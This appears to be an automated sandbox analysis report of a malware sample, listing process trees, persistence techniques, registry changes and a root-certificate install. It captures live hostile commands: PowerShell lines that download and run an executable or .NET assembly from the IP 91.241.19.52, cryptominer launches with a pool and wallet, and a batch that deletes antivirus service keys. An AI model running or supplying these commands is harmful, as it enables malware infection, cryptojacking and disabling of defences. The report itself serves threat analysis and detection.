Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4492 schtasks.exe
4740 schtasks.exe
4496 schtasks.exe
4392 schtasks.exe
4416 schtasks.exe
4484 schtasks.exe
4648 schtasks.exe
4664 schtasks.exe

pid	process
4492	schtasks.exe
4740	schtasks.exe
4496	schtasks.exe
4392	schtasks.exe
4416	schtasks.exe
4484	schtasks.exe
4648	schtasks.exe
4664	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

fsucenter.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	fsucenter.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	fsucenter.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2c30e7340666a2b59ee88f5250ab50e5.exe

pid	process
2496	2c30e7340666a2b59ee88f5250ab50e5.exe
2496	2c30e7340666a2b59ee88f5250ab50e5.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3024
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

2c30e7340666a2b59ee88f5250ab50e5.exe

pid process

2496 2c30e7340666a2b59ee88f5250ab50e5.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

pid	process
3024

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exe8CD5.exeWerFault.exeA63E.exeWerFault.exeexplorer.exe

description	pid	process
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeRestorePrivilege	3464	WerFault.exe
Token: SeBackupPrivilege	3464	WerFault.exe
Token: SeDebugPrivilege	3760	8CD5.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	3464	WerFault.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	1820	WerFault.exe
Token: SeDebugPrivilege	1588	A63E.exe
Token: SeDebugPrivilege	2132	WerFault.exe
Token: SeDebugPrivilege	1796	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

837E.tmp

pid process

2336 837E.tmp
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3024

pid	process
2336	837E.tmp

pid	process
3024

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2c30e7340666a2b59ee88f5250ab50e5.exe837E.exe837E.tmp837E.exe837E.tmp914B.exeRuntimebroker.exe

description	pid	process	target process
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3628 wrote to memory of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 3024 wrote to memory of 3668	3024		837E.exe
PID 3024 wrote to memory of 3668	3024		837E.exe
PID 3024 wrote to memory of 3668	3024		837E.exe
PID 3668 wrote to memory of 2988	3668	837E.exe	837E.tmp
PID 3668 wrote to memory of 2988	3668	837E.exe	837E.tmp
PID 3668 wrote to memory of 2988	3668	837E.exe	837E.tmp
PID 3024 wrote to memory of 3760	3024		8CD5.exe
PID 3024 wrote to memory of 3760	3024		8CD5.exe
PID 3024 wrote to memory of 3760	3024		8CD5.exe
PID 2988 wrote to memory of 3288	2988	837E.tmp	837E.exe
PID 2988 wrote to memory of 3288	2988	837E.tmp	837E.exe
PID 2988 wrote to memory of 3288	2988	837E.tmp	837E.exe
PID 3288 wrote to memory of 2336	3288	837E.exe	837E.tmp
PID 3288 wrote to memory of 2336	3288	837E.exe	837E.tmp
PID 3288 wrote to memory of 2336	3288	837E.exe	837E.tmp
PID 3024 wrote to memory of 1584	3024		914B.exe
PID 3024 wrote to memory of 1584	3024		914B.exe
PID 3024 wrote to memory of 1584	3024		914B.exe
PID 3024 wrote to memory of 2544	3024		9738.exe
PID 3024 wrote to memory of 2544	3024		9738.exe
PID 3024 wrote to memory of 2544	3024		9738.exe
PID 2336 wrote to memory of 1792	2336	837E.tmp	fsucenter.exe
PID 2336 wrote to memory of 1792	2336	837E.tmp	fsucenter.exe
PID 2336 wrote to memory of 1792	2336	837E.tmp	fsucenter.exe
PID 1584 wrote to memory of 1832	1584	914B.exe	Runtimebroker.exe
PID 1584 wrote to memory of 1832	1584	914B.exe	Runtimebroker.exe
PID 1584 wrote to memory of 1832	1584	914B.exe	Runtimebroker.exe
PID 3024 wrote to memory of 3644	3024		9B8E.exe
PID 3024 wrote to memory of 3644	3024		9B8E.exe
PID 3024 wrote to memory of 3644	3024		9B8E.exe
PID 3024 wrote to memory of 2716	3024		9E9C.exe
PID 3024 wrote to memory of 2716	3024		9E9C.exe
PID 3024 wrote to memory of 2716	3024		9E9C.exe
PID 3024 wrote to memory of 1588	3024		A63E.exe
PID 3024 wrote to memory of 1588	3024		A63E.exe
PID 3024 wrote to memory of 1588	3024		A63E.exe
PID 3024 wrote to memory of 3020	3024		AB50.exe
PID 3024 wrote to memory of 3020	3024		AB50.exe
PID 3024 wrote to memory of 3020	3024		AB50.exe
PID 1832 wrote to memory of 2720	1832	Runtimebroker.exe	powershell.exe
PID 1832 wrote to memory of 2720	1832	Runtimebroker.exe	powershell.exe
PID 1832 wrote to memory of 2720	1832	Runtimebroker.exe	powershell.exe
PID 3024 wrote to memory of 940	3024		explorer.exe
PID 3024 wrote to memory of 940	3024		explorer.exe
PID 3024 wrote to memory of 940	3024		explorer.exe
PID 3024 wrote to memory of 940	3024		explorer.exe
PID 3024 wrote to memory of 3832	3024		explorer.exe
PID 3024 wrote to memory of 3832	3024		explorer.exe
PID 3024 wrote to memory of 3832	3024		explorer.exe
PID 3024 wrote to memory of 1796	3024		explorer.exe
PID 3024 wrote to memory of 1796	3024		explorer.exe
PID 3024 wrote to memory of 1796	3024		explorer.exe
PID 3024 wrote to memory of 1796	3024		explorer.exe
PID 3024 wrote to memory of 3884	3024		explorer.exe
PID 3024 wrote to memory of 3884	3024		explorer.exe
PID 3024 wrote to memory of 3884	3024		explorer.exe
PID 3024 wrote to memory of 4160	3024		explorer.exe
PID 3024 wrote to memory of 4160	3024		explorer.exe

C:\Users\Admin\AppData\Local\Temp\2c30e7340666a2b59ee88f5250ab50e5.exe
"C:\Users\Admin\AppData\Local\Temp\2c30e7340666a2b59ee88f5250ab50e5.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3628

C:\Users\Admin\AppData\Local\Temp\2c30e7340666a2b59ee88f5250ab50e5.exe
"C:\Users\Admin\AppData\Local\Temp\2c30e7340666a2b59ee88f5250ab50e5.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2496

C:\Users\Admin\AppData\Local\Temp\837E.exe
C:\Users\Admin\AppData\Local\Temp\837E.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3668

C:\Users\Admin\AppData\Local\Temp\is-EK51K.tmp\837E.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EK51K.tmp\837E.tmp" /SL5="$300F2,4193427,831488,C:\Users\Admin\AppData\Local\Temp\837E.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2988

C:\Users\Admin\AppData\Local\Temp\837E.exe
"C:\Users\Admin\AppData\Local\Temp\837E.exe" /VERYSILENT
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3288

C:\Users\Admin\AppData\Local\Temp\is-F2UJQ.tmp\837E.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F2UJQ.tmp\837E.tmp" /SL5="$400F2,4193427,831488,C:\Users\Admin\AppData\Local\Temp\837E.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2336

C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1792

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3016

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4232

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2636

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3288

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:4460

C:\Users\Public\Videos\wininit.exe
"C:\Users\Public\Videos\wininit.exe"
8⤵
- Executes dropped EXE
PID:4896

C:\ProgramData\Systemd\HostData.exe
NULL
6⤵
- Executes dropped EXE
PID:2284

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3196

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4272

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4332

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4492

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2276

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4828

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4924

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4972

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4724

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4804

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4712

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5024

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5052

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5060

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1876

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3156

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2380

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1104

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5104

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4212

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4140

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4448

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4932

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2288

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1480

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:788

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1856

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4456

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4692

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4952

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4216

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4724

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4688

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4704

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4996

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5036

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5056

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5072

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5060

C:\Users\Admin\AppData\Local\Temp\8CD5.exe
C:\Users\Admin\AppData\Local\Temp\8CD5.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Users\Admin\AppData\Local\Temp\914B.exe
C:\Users\Admin\AppData\Local\Temp\914B.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1584

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
PID:2720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
PID:4352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:4684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete 